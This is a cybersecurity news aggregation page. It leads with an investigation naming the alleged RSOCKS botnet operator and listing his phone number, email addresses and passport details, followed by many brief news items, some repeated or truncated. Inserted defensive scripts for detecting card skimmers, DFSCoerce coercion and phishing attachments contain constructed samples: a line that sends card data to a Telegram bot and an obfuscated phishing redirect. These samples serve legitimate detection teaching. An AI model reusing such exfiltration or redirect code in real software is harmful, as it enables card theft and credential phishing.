Authorities in the United States, Germany, the Netherlands and the U.K. last week said they dismantled the “RSOCKS” botnet, a collection of millions of hacked devices that were sold as “proxies” to cybercriminals looking for ways to route their malicious traffic through someone else’s computer. While the coordinated action did not name the Russian hackers allegedly behind RSOCKS, KrebsOnSecurity has identified its owner as a 35-year-old Russian man living abroad who also runs the world’s top spam forum.

Image: The RUSdot mailer, the email spamming tool made and sold by the administrator of RSOCKS.

According to a statement by the U.S. Department of Justice, RSOCKS offered clients access to IP addresses assigned to devices that had been hacked:

“A cybercriminal who wanted to utilize the RSOCKS platform could use a web browser to navigate to a web-based ‘storefront’ (i.e., a public web site that allows users to purchase access to the botnet), which allowed the customer to pay to rent access to a pool of proxies for a specified daily, weekly, or monthly time period. The cost for access to a pool of RSOCKS proxies ranged from $30 per day for access to 2,000 proxies to $200 per day for access to 90,000 proxies.”

The DOJ’s statement doesn’t mention that RSOCKS has been in operation since 2014, when access to the web store for the botnet was first advertised on multiple Russian-language cybercrime forums.

The user “RSOCKS” on the Russian crime forum Verified changed his name to RSOCKS from a previous handle: “Stanx,” whose very first sales thread on Verified in 2016 quickly ran afoul of the forum’s rules and prompted a public chastisement by the forum’s administrator.

Verified was hacked twice in the past few years, and each time the private messages of all users on the forum were leaked. Those messages show that after being warned of his forum infraction, Stanx sent a private message to the Verified administrator detailing his cybercriminal bona fides.

“I am the owner of the RUSdot forum (former Spamdot),” Stanx wrote in Sept. 2016. “In spam topics, people know me as a reliable person.”

Image: A Google-translated version of the Rusdot spam forum.
RUSdot is the successor forum to Spamdot, a far more secretive and restricted forum where most of the world’s top spammers, virus writers and cybercriminals collaborated for years before the community’s implosion in 2010. Even today, the RUSdot Mailer is advertised for sale at the top of the RUSdot community forum.

Stanx said he was a longtime member of several major forums, including the Russian hacker forum Antichat (since 2005), and the Russian crime forum Exploit (since April 2013). In an early post to Antichat in January 2005, Stanx disclosed that he is from Omsk, a large city in the Siberian region of Russia.

According to the cyber intelligence firm Intel 471, the user Stanx indeed registered on Exploit in 2013, using the email address stanx@rusdot.com, and the ICQ number 399611. A search in Google for that ICQ number turns up a cached version of a Vkontakte profile for a Denis “Neo” Kloster, from Omsk, Russia.

Cybersecurity firm Constella Intelligence shows that in 2017, someone using the email address istanx@gmail.com registered at the Russian freelancer job site fl.ru with the profile name of “Denis Kloster” and the Omsk phone number of 79136334444. Another record indexed by Constella suggests Denis’s real surname may in fact be “Emilyantsev” [Емельянцев]. That phone number is tied to the WHOIS registration records for multiple domain names over the years, including proxy[.]info, allproxy[.]info, kloster.pro and deniskloster.com.

Image: A copy of the passport for Denis Kloster, as posted to his Vkontakte page in 2019. It shows that in Oct. 2019, he obtained a visa from the American Embassy in Bangkok, Thailand.

The “about me” section of DenisKloster.com says the 35-year-old was born in Omsk, that he got his first computer at age 12, and graduated from high school at 16. Kloster says he’s worked in many large companies in Omsk as a system administrator, web developer and photographer.
According to Kloster’s blog, his first real job was running an “online advertising” firm he founded called Internet Advertising Omsk (“riOmsk”), and that he even lived in New York City for a while.

“Something new was required and I decided to leave Omsk and try to live in the States,” Kloster wrote in 2013. “I opened an American visa for myself, it was not difficult to get. And so I moved to live in New York, the largest city in the world, in a country where all wishes come true. But even this was not enough for me, and since then I began to travel the world.”

The current version of the About Me page on Kloster’s site says he closed his advertising business in 2013 to travel the world and focus on his new company: one that provides security and anonymity services to customers around the world. Kloster’s vanity website and LinkedIn page both list him as CEO of a company called “SL MobPartners.”

In 2016, Deniskloster.com featured a post celebrating three years in operation. The anniversary post said Kloster’s anonymity business had grown to nearly two dozen employees, most of whom were included in a group photo posted to that article (and some of whom Kloster thanked by their first names and last initials).

Image: The employees who kept things running for RSOCKS, circa 2016.

“Thanks to you, we are now developing in the field of information security and anonymity!,” the post enthuses. “We make products that are used by thousands of people around the world, and this is very cool! And this is just the beginning!!! We don’t just work together and we’re not just friends, we’re Family.”

Mr. Kloster did not respond to repeated requests for comment.

It’s not clear if the coordinated takedown targeting the RSOCKS botnet will be permanent, as the botnet’s owners could simply rebuild — and possibly rebrand — their crime machine. Based on the RSOCKS owner’s posts, that is exactly what they intend to do.
“RSocks ceases to exist,” wrote the Rsocks account on the BlackHatWorld forum on June 17. “But don’t worry. All the active plans and fund balances will be transferred to another service. Stay tuned. We will inform you about its name and all the details later.” Rsocks told the BlackHatWorld community they would be back soon under a new name. Malware-based proxy services like RSOCKS have struggled to remain competitive in a cybercrime market with increasingly sophisticated proxy services that offer many additional features. The demise of RSOCKS follows closely on the heels of VIP72[.]com, a competing proxy botnet service that operated for a decade before its owners pulled the plug on the service last year.
Cleafy observed a campaign involving BRATA, aimed at obtaining a long-term presence on a targeted network to steal sensitive information from financial apps. The banking Trojan has been updated with new phishing techniques and new classes that request more permissions on the infected device, and it now drops a second-stage payload fetched from the C2 server.
The 1st International Cybersecurity Challenge (ICC) concluded on Friday 17th June after two days of intensive and relentless competition between the teams to master this year’s cybersecurity challenges.
Claroty laid bare details of 15 security flaws in Siemens SINEC Network Management System. These can be abused, independently or in combination, to pose numerous risks to Siemens systems: an attacker could escalate their permissions, gain administrative rights to the system and leak sensitive information.
On Tuesday, June 14, 2022, Adobe released a security patch fixing a set of vulnerabilities identified as CVE-2022-30649, CVE-2022-30666, CVE-2022-30667, CVE-2022-30668, and CVE-2022-30669.
A new carding site, BidenCash, has been found leaking credit card details and the personal information of the cardholders for as little as $0.15 each, in a bid to attract the attention of cybercriminals worldwide. To promote the site, the admins also gave away for free a CSV database containing 6,600 credit cards. The majority of these cards are issued by VISA and belong to individuals based in the United States.
A WooCommerce credit card skimmer was found using a Telegram bot to exfiltrate the stolen data, which is later sold on underground forums, resulting in fraudulent transactions on victims’ credit cards. eCommerce website owners are advised to keep all their software up to date, use strong passwords and firewall services, and protect the admin panel.
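As an added example (not code from the report above and not part of WooCommerce), the scanner below shows the check a site owner or responder would run on a compromised shop: a skimmer that ships card data through a Telegram bot has to embed the bot token in a call to api.telegram.org/bot<id>:<token>/sendMessage (or sendDocument), either in clear text or behind base64, and that endpoint is a reliable hunting signal in JS and PHP files. The sample sources, bot ids, tokens and chat ids are constructed for the example and are not real.

```python
"""Scan web-shop source files for card exfiltration through the Telegram Bot API.

Added example; not code from the report it follows and not part of
WooCommerce. This pulls every string literal out of a JS/PHP file, tries a
base64 decode on each one, and reports any Telegram bot endpoint it finds,
whether it was in the clear or hidden in an encoded literal. The sample
sources and tokens below are constructed and not real.
"""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import List, Optional

# Telegram bot tokens look like <numeric bot id>:<opaque string>; the lengths
# here are deliberately loose so truncated or padded variants still hit.
BOT_URL_RE = re.compile(r"api\.telegram\.org/bot(\d{6,12}):([A-Za-z0-9_-]{20,})", re.I)
CHAT_ID_RE = re.compile(r"chat_id\W{0,2}?(-?\d{5,})")
STRING_RE = re.compile(r"""(["'])((?:\\.|(?!\1).)*)\1""", re.S)
B64_RE = re.compile(r"^[A-Za-z0-9+/=]{16,}$")


@dataclass(frozen=True)
class Finding:
    bot_id: str
    token_hint: str        # first four characters only; do not log the secret
    chat_id: Optional[str]
    decoded: bool          # True when the URL was hidden behind base64


def _try_base64(literal: str) -> Optional[str]:
    """Decode a literal that looks like base64 text, else None."""
    if not B64_RE.match(literal):
        return None
    try:
        return base64.b64decode(literal, validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def scan_source(src: str) -> List[Finding]:
    """Return one Finding per distinct Telegram bot id referenced in src."""
    candidates = [(src, False)]
    for _, literal in STRING_RE.findall(src):
        decoded = _try_base64(literal)
        if decoded:
            candidates.append((decoded, True))
    findings, seen = [], set()
    for text, was_decoded in candidates:
        for m in BOT_URL_RE.finditer(text):
            bot_id, token = m.group(1), m.group(2)
            if bot_id in seen:
                continue
            seen.add(bot_id)
            # chat_id is usually appended at the call site, so fall back to the raw file
            chat = CHAT_ID_RE.search(text) or CHAT_ID_RE.search(src)
            findings.append(Finding(bot_id, token[:4] + "...",
                                    chat.group(1) if chat else None, was_decoded))
    return findings


# Constructed sample 1: clear-text exfil from a checkout page.
SAMPLE_CLEAR = """
var card = {n: document.getElementById('card_number').value, c: cvv, e: exp};
fetch('https://api.telegram.org/bot123456789:AAFakeTokenForExampleOnly000000000/sendMessage'
      + '?chat_id=555000111&text=' + encodeURIComponent(JSON.stringify(card)));
"""
# Constructed sample 2: the same kind of endpoint hidden in a base64 literal.
_HIDDEN = base64.b64encode(
    b"https://api.telegram.org/bot987654321:BBExampleTokenNotReal000000000000/sendDocument").decode()
SAMPLE_B64 = "var u = atob('" + _HIDDEN + "'); new Image().src = u + '?chat_id=-100200300400';"

if __name__ == "__main__":
    for sample in (SAMPLE_CLEAR, SAMPLE_B64):
        for f in scan_source(sample):
            print(f"bot {f.bot_id} token {f.token_hint} chat {f.chat_id} decoded={f.decoded}")
```

Run it over the shop's theme, plugin and uploads directories (including .php files, since these skimmers are often injected server-side); any hit is a confirmed exfiltration channel, and the bot id and chat id are what you hand to Telegram's abuse contact and to the card brands.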
The switch in modus operandi, spotted by Bitdefender, comes in the wake of Raccoon Stealer temporarily closing the project after one of its team members responsible for critical operations passed away in the Russo-Ukrainian war in March 2022.
The partnership between CYBER.ORG and the TEALS program will increase nationwide K-12 cybersecurity literacy and ensure that more students can explore the possibility of careers within the field.
The CoinEgg scam uses fake domains and social media accounts to coax users into investing in fake exchanges. After victims had invested, the scammers approached them again posing as investigative agents who could help them with the scam.
The recent ransomware attack on Illinois’ Lincoln College shows the growing cyber risks facing today’s schools. Unable to recover from the fatal blow that came out of the blue, the college recently closed its doors, ending 157 years of operations.
Ransomware attackers are betting on the fact that the losses from restoring systems are so high that a target is willing to pay to get a copy of the digital key, which can decrypt the files and restore everything to normal.
Air raid sirens sounded in the Israeli cities of Jerusalem and Eilat on Sunday evening and it appears that they were triggered by a cyberattack, possibly conducted by Iranian hackers.
The playbooks are intended to improve and standardize the approaches used by agencies to identify, remediate, and recover from vulnerabilities and incidents affecting their systems.
Tornado Cash is a protocol that allows users to send in some cryptocurrency using their own wallets and get it back via different addresses. Its code is designed to mix a user’s crypto with a pool of other users’ crypto in a smart contract.
Research published on Tuesday shows there's no truth to the claim that Mega, or an entity with control over Mega's infrastructure, is unable to access data stored on the service.
The challenge for a CISO is not only identifying all the potential open-source or third-party components that have been used in an enterprise system but also auditing the maintainers to ensure secure coding practices and vulnerability patching.
According to Sean Ragan, the FBI’s special agent in charge of San Francisco and Sacramento, cryptocurrency scams pose a significant threat on the social platform as they can target senior executives.
A cross-border operation, supported by Europol and involving the Belgian Police and the Dutch Police, resulted in the dismantling of an organized crime group involved in phishing, fraud, scams, and money laundering.
While the healthcare industry has always been a target of threat actors and particularly ransomware groups because of a lack of cybersecurity funding, 2022 has already shown a sharp increase in the rate of breaches.
A Distributed Denial of Service attack (DDoS attack) disrupted the proceedings at the 25th St Petersburg International Economic Forum, regarded as the Russian answer to the Davos World Economic Forum.
The round was led by the Late Stage Arm program of venture capital firm StageOne Ventures, alongside tech investor Neva SGR, and Israeli-based tech growth capital fund Viola Growth.
The Ukrainian Computer Emergency Response Team (CERT) is warning that Russian hacking groups are exploiting the Follina code execution vulnerability in new phishing campaigns to install the CredoMap malware and Cobalt Strike beacons.
The rapid transaction-settlement speed of Zelle that helped drive its adoption also helps scammers create a false sense of urgency to trick consumers into authorizing immediate payments.
Aimed at financial institutions and insurance firms, OpCon is a cross-platform process automation and orchestration solution that can be used for the management of workloads across business-critical operations.
A new Windows NTLM relay attack dubbed DFSCoerce abuses the MS-DFSNM protocol (Distributed File System Namespace Management) to coerce a domain controller into authenticating to an attacker-controlled host, which can be leveraged to take over the entire Windows domain. The proof-of-concept script is based on the PetitPotam exploit. In the demonstrated attack, the researchers relayed the coerced authentication to Active Directory Certificate Services (AD CS), which is exposed to NTLM relay when its enrollment endpoints accept NTLM. The best defense is to follow the mitigations in Microsoft's advisory on NTLM relay attacks against AD CS (KB5005413), in particular enabling Extended Protection for Authentication on the AD CS web endpoints and disabling NTLM wherever it is not needed.
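As an added detection example (not part of the item above and not code from the DFSCoerce proof of concept), the script below hunts for the coercion itself rather than the relay: DFSCoerce issues the MS-DFSNM methods NetrDfsAddStdRoot and NetrDfsRemoveStdRoot over the netdfs named pipe against a domain controller, and almost nothing other than a DFS administration host has a reason to do that. The log layout mimics Zeek's dce_rpc.log, the sample records are constructed, and the DC address and admin allowlist are assumptions for the example.

```python
"""Hunt for DFSCoerce-style MS-DFSNM coercion in DCE/RPC logs.

Added example (not from the original item or the DFSCoerce PoC). DFSCoerce
calls NetrDfsAddStdRoot / NetrDfsRemoveStdRoot over the netdfs pipe with an
attacker-chosen server name, so the DC authenticates outbound with its
machine account and that NTLM authentication is relayed to AD CS. A DC
receiving those two calls from anything but a DFS admin host is worth an alert.

Assumptions: records mimic Zeek's dce_rpc.log (tab-separated: ts uid orig_h
orig_p resp_h resp_p rtt named_pipe endpoint operation); the DC address and
the admin allowlist below are made up for the example.
"""
from dataclasses import dataclass
from typing import Iterable, List, Optional, Set

COERCION_OPS = {"NetrDfsAddStdRoot", "NetrDfsRemoveStdRoot"}
FIELDS = ("ts", "uid", "orig_h", "orig_p", "resp_h", "resp_p",
          "rtt", "named_pipe", "endpoint", "operation")


@dataclass(frozen=True)
class Alert:
    ts: str
    caller: str
    dc: str
    operation: str


def parse_dce_rpc(line: str) -> Optional[dict]:
    """Parse one tab-separated record; skip comment/header rows and short rows."""
    if not line or line.startswith("#"):
        return None
    parts = line.rstrip("\n").split("\t")
    if len(parts) < len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def find_dfs_coercion(lines: Iterable[str], domain_controllers: Set[str],
                      allowed_callers: Set[str]) -> List[Alert]:
    """One Alert per MS-DFSNM coercion method called on a DC by an unexpected host.

    Pipe/endpoint matching is case-insensitive because sensors differ in how
    they render the \\PIPE\\netdfs name.
    """
    alerts = []
    for line in lines:
        rec = parse_dce_rpc(line)
        if rec is None:
            continue
        is_dfsnm = ("netdfs" in rec["endpoint"].lower()
                    or "netdfs" in rec["named_pipe"].lower())
        if not is_dfsnm or rec["operation"] not in COERCION_OPS:
            continue
        if rec["resp_h"] not in domain_controllers:
            continue          # the coercion that matters targets a DC account
        if rec["orig_h"] in allowed_callers:
            continue          # expected DFS management host
        alerts.append(Alert(rec["ts"], rec["orig_h"], rec["resp_h"], rec["operation"]))
    return alerts


# Constructed sample: 10.0.0.10 is the DC, 10.0.0.5 the legitimate DFS admin
# box, 10.0.0.50 a workstation running the DFSCoerce PoC, 10.0.0.30 a plain
# file server.
SAMPLE_LOG = """#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\trtt\tnamed_pipe\tendpoint\toperation
1655820000.123\tCxyZ1\t10.0.0.50\t49872\t10.0.0.10\t445\t0.002\t\\\\PIPE\\\\netdfs\tnetdfs\tNetrDfsRemoveStdRoot
1655820000.456\tCxyZ2\t10.0.0.50\t49873\t10.0.0.10\t445\t0.001\t\\\\PIPE\\\\netdfs\tnetdfs\tNetrDfsAddStdRoot
1655820001.000\tCxyZ3\t10.0.0.20\t49900\t10.0.0.10\t445\t0.003\t\\\\PIPE\\\\lsarpc\tlsarpc\tLsarOpenPolicy2
1655820002.000\tCxyZ4\t10.0.0.5\t50000\t10.0.0.10\t445\t0.002\t\\\\PIPE\\\\netdfs\tnetdfs\tNetrDfsAddStdRoot
1655820003.000\tCxyZ5\t10.0.0.50\t50010\t10.0.0.30\t445\t0.002\t\\\\PIPE\\\\netdfs\tnetdfs\tNetrDfsAddStdRoot
""".splitlines()

DCS = {"10.0.0.10"}
DFS_ADMIN_HOSTS = {"10.0.0.5"}

if __name__ == "__main__":
    for a in find_dfs_coercion(SAMPLE_LOG, DCS, DFS_ADMIN_HOSTS):
        print(f"{a.ts} possible DFSCoerce: {a.caller} -> {a.dc} {a.operation}")
```

Pair this with the relay side: an NTLM logon (event 4624, logon type 3) on the AD CS server whose account is the DC's machine account and whose source address is not the DC is the other half of the same attack.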
One of the bills signed into law on Tuesday, dubbed the Federal Rotational Cyber Workforce Program Act, establishes a program to allow cybersecurity professionals to rotate through multiple federal agencies and enhance their expertise.
The most severe of these bugs is CVE-2022-2156, which is described as a critical-severity use-after-free issue in Base. The security flaw was identified by Mark Brand of Google Project Zero.
The Series A financing provides capital for the Tel Aviv-based company to build "Application Detection and Response" technology capable of ferreting out malicious activities executed by insiders and imposters in enterprise applications.
QNAP has warned customers today that some of its NAS devices (with non-default configurations) are vulnerable to attacks that would exploit a three-year-old critical PHP vulnerability allowing remote code execution.
Retired Gen. Keith Alexander, the former NSA chief and head of U.S. Cyber Command, warned that Russia is likely to unleash cyberattacks against the U.S. financial sector as retaliation for the West’s involvement in its war with Ukraine.
Digital infrastructure services provider Cloudflare, which suffered an outage on Tuesday, said that the issue occurred because of a network change, not owing to a cyberattack.
CERT-UA issued two separate alerts unveiling the malicious activity by APT28 and UAC-0098 hacker groups as they weaponized Follina to deploy Cobalt Strike beacon and CredoMap malware, respectively. APT28 is sending emails laden with a malicious document that tries to exploit the fear among Ukrainians about a potential nuclear attack.
A voicemail-themed phishing campaign is targeting individuals in key U.S. vertical markets to steal their Office 365 and Outlook credentials, while evading anti-phishing tools with a CAPTCHA check. The email carries an HTML attachment whose name uses a music-note character to make the file look like a sound clip; the file's obfuscated JavaScript then redirects the victim to a phishing site.
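As an added example (not from the report above, and not the campaign's own code), the triage function below covers the two parts of the lure a mail gateway or analyst can check statically: an HTML attachment whose filename is dressed up with a music-note glyph or an audio extension, and JavaScript whose redirect is buried under atob(), unescape() or String.fromCharCode() layers. It peels those encodings without executing the script and reports the URLs it recovers. The sample attachment, its filename and the destination host are constructed for the example.

```python
"""Static triage of an HTML 'voicemail' attachment.

Added example, not from the report it follows. The lure has three parts: a
filename styled to look like an audio clip, an .html payload whose script is
obfuscated, and a redirect to the phishing page. This decodes the common
encodings statically (no JS execution) and reports recovered URLs.
The sample attachment below is constructed.
"""
import base64
import binascii
import html
import re
import urllib.parse
from dataclasses import dataclass
from typing import List, Tuple

AUDIO_GLYPHS = {"\u266a", "\u266b", "\u266c", "\U0001f3b5", "\U0001f3b6"}  # music-note glyphs
AUDIO_EXT_HINTS = (".mp3", ".wav", ".m4a", ".wma")
HTML_EXTS = (".html", ".htm", ".shtml")

ATOB_RE = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
UNESCAPE_RE = re.compile(r"(?:unescape|decodeURIComponent)\(\s*['\"]([^'\"]+)['\"]\s*\)")
CHARCODE_RE = re.compile(r"fromCharCode\(([\d,\s]+)\)")
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)


def looks_like_audio_masquerade(filename: str) -> bool:
    """True for an HTML file whose name is styled to read as a sound clip."""
    low = filename.lower()
    if not low.endswith(HTML_EXTS):
        return False
    return any(ch in AUDIO_GLYPHS for ch in filename) or any(h in low for h in AUDIO_EXT_HINTS)


def _js_unescape(s: str) -> str:
    # JS unescape() also understands %uXXXX, which urllib does not.
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return urllib.parse.unquote(s)


def decode_layers(script: str, max_rounds: int = 8) -> Tuple[str, int]:
    """Peel nested encodings until a round yields nothing new.
    Returns (all text seen, number of rounds that produced new text)."""
    corpus, seen, rounds = [script], {script}, 0
    for _ in range(max_rounds):
        blob = "\n".join(corpus)
        fresh = []
        for m in ATOB_RE.finditer(blob):
            try:
                fresh.append(base64.b64decode(m.group(1)).decode("utf-8", "replace"))
            except (binascii.Error, ValueError):
                pass
        fresh += [_js_unescape(m.group(1)) for m in UNESCAPE_RE.finditer(blob)]
        for m in CHARCODE_RE.finditer(blob):
            codes = [c.strip() for c in m.group(1).split(",") if c.strip()]
            fresh.append("".join(chr(int(c)) for c in codes))
        fresh = [f for f in fresh if f not in seen]
        if not fresh:
            break
        seen.update(fresh)
        corpus.extend(fresh)
        rounds += 1
    return "\n".join(corpus), rounds


@dataclass
class Verdict:
    masquerade: bool
    decode_rounds: int
    urls: List[str]

    @property
    def suspicious(self) -> bool:
        # Either signal alone deserves a look; both together are a strong hit.
        return self.masquerade or (self.decode_rounds > 0 and bool(self.urls))


def triage_attachment(filename: str, content: str) -> Verdict:
    """Combine the filename check with URLs recovered from the decoded script."""
    text, rounds = decode_layers(content)
    urls: List[str] = []
    for u in URL_RE.findall(text):
        u = html.unescape(u)
        if u not in urls:
            urls.append(u)
    return Verdict(looks_like_audio_masquerade(filename), rounds, urls)


# Constructed sample: a redirect hidden under unescape() inside atob().
_INNER = '<script>window.location.href="https://login-example.invalid/voice/?id=abc";</script>'
_LAYER1 = "document.write(unescape('" + urllib.parse.quote(_INNER) + "'));"
SAMPLE_CONTENT = "eval(atob('" + base64.b64encode(_LAYER1.encode()).decode() + "'));"
SAMPLE_FILENAME = "VM_00-37s \u266b.html"

if __name__ == "__main__":
    v = triage_attachment(SAMPLE_FILENAME, SAMPLE_CONTENT)
    print(v.suspicious, v.decode_rounds, v.urls)
```

The recovered URL is what goes to the blocklist and to the takedown request; the CAPTCHA in front of the phishing page only matters to crawlers that fetch it, which this static pass never does.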
Adobe’s product checks whether components from 30 security products are loaded into its processes and likely blocks them, effectively preventing those products from monitoring it for malicious activity.
Attackers are using fake Facebook copyright-infringement emails to lure members of the Elections Infrastructure Information Sharing and Analysis Center (EI-ISAC). The body of the email tells the recipient that Facebook has taken down some of their content as the result of a copyright infringement. The primary goal appears to be stealing Facebook login passwords and other information from EI-ISAC members.
Red Hat Security Advisory 2022-5157-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include a privilege escalation vulnerability.
Red Hat Security Advisory 2022-5163-01 - The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server. Issues addressed include a null pointer vulnerability.
Red Hat Security Advisory 2022-5152-01 - Red Hat Openshift GitOps is a declarative way to implement continuous deployment for cloud native applications. Issues addressed include a cross site scripting vulnerability.
Red Hat Security Advisory 2022-4999-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 3.11.715. Issues addressed include a memory exhaustion vulnerability.
Over the past year, Trail of Bits was engaged by the Defense Advanced Research Projects Agency (DARPA) to investigate the extent to which blockchains are truly decentralized. They focused primarily on the two most popular blockchains: Bitcoin and Ethereum. They also investigated proof-of-stake (PoS) blockchains and Byzantine fault tolerant consensus protocols in general. This report provides a high-level summary of results from the academic literature, as well as their novel research on software centrality and the topology of the Bitcoin consensus network.
The operators behind the Rig Exploit Kit have swapped the Raccoon Stealer malware for the Dridex financial trojan as part of an ongoing campaign that commenced in January 2022. The switch in modus operandi, spotted by Romanian company Bitdefender, comes in the wake of Raccoon Stealer temporarily closing the project after one of its team members responsible for critical operations passed away in
Europol on Tuesday announced the dismantling of an organized crime group that dabbled in phishing, fraud, scams, and money laundering activities. The cross-border operation, which involved law enforcement authorities from Belgium and the Netherlands, saw the arrests of nine individuals in the Dutch nation. The suspects are men between the ages of 25 and 36 from Amsterdam, Almere, Rotterdam, and
The Computer Emergency Response Team of Ukraine (CERT-UA) has cautioned of a new set of spear-phishing attacks exploiting the "Follina" flaw in the Windows operating system to deploy password-stealing malware. Attributing the intrusions to a Russian nation-state group tracked as APT28 (aka Fancy Bear or Sofacy), the agency said the attacks commence with a lure document titled "Nuclear Terrorism
A newly discovered Magecart skimming campaign has its roots in a previous attack activity going all the way back to November 2021. To that end, it has come to light that two malware domains identified as hosting credit card skimmer code — "scanalytic[.]org" and "js.staticounter[.]net" — are part of a broader infrastructure used to carry out the intrusions, Malwarebytes said in a Tuesday analysis
A new piece of research from academics at ETH Zurich has identified a number of critical security issues in the MEGA cloud storage service that could be leveraged to break the confidentiality and integrity of user data. In a paper titled "MEGA: Malleable Encryption Goes Awry," the researchers point out how MEGA's system does not protect its users against a malicious server, thereby enabling a
The Strava fitness-tracking app is being used to spy upon members of the Israeli military, tracking their movements at secret bases across the country and potentially even help observe their activities when they travel overseas. Read more in my article on the Hot for Security blog.